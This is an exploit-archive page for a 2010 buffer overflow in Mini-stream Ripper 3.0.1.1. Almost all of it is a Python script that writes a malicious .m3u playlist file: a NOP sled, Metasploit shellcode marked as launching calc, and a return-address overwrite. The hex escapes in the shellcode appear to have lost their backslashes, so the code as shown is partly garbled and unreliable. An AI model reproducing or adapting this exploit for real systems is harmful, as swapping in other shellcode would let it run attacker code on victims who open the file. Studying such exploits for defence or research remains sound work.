Mini-stream Ripper 3.0.1.1 (.m3u) HREF Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-stream Ripper 3.0.1.1 (.m3u) HREF Buffer Overflow
# Published : 2010-03-10
# Author : l3D
# Previous Title : Yahoo Player v1.0 (.m3u) Buffer Overflow Exploit (direct EIP overwrite)
# Next Title : Lenovo Hotkey Driver <= v5.33 Privilege Escalation

#!/usr/bin/env python
#Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution
#Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

nops1='x90'*0x2a80
#system("calc") - Metasploit.com
shellcode=("xb8x19xfcx3cx9bxd9xc4x31xc9xb1x32xd9x74x24xf4"
"x5bx83xebxfcx31x43x0ex03x5axf2xdex6exa0xe2x96"
"x91x58xf3xc8x18xbdxc2xdax7fxb6x77xebxf4x9ax7b"
"x80x59x0ex0fxe4x75x21xb8x43xa0x0cx39x62x6cxc2"
"xf9xe4x10x18x2exc7x29xd3x23x06x6dx09xcbx5ax26"
"x46x7ex4bx43x1ax43x6ax83x11xfbx14xa6xe5x88xae"
"xa9x35x20xa4xe2xadx4axe2xd2xccx9fxf0x2fx87x94"
"xc3xc4x16x7dx1ax24x29x41xf1x1bx86x4cx0bx5bx20"
"xafx7ex97x53x52x79x6cx2ex88x0cx71x88x5bxb6x51"
"x29x8fx21x11x25x64x25x7dx29x7bxeaxf5x55xf0x0d"
"xdaxdcx42x2axfex85x11x53xa7x63xf7x6cxb7xcbxa8"
"xc8xb3xf9xbdx6bx9ex97x40xf9xa4xdex43x01xa7x70"
"x2cx30x2cx1fx2bxcdxe7x64xc3x87xaaxccx4cx4ex3f"
"x4dx11x71x95x91x2cxf2x1cx69xcbxeax54x6cx97xac"
"x85x1cx88x58xaaxb3xa9x48xc9x52x3ax10x0e")
nops2='x90'*(0xa9ff-len(nops1+shellcode))
ret='x30x3Dx0D'
payload=nops1+shellcode+nops2+ret

evil="""<ASX Version="3.0">
<ENTRY>
    <REF HREF="%s"/>
</ENTRY>
</ASX>
""" % payload

bad=open('crash.m3u', 'w')
bad.write(evil)
bad.close()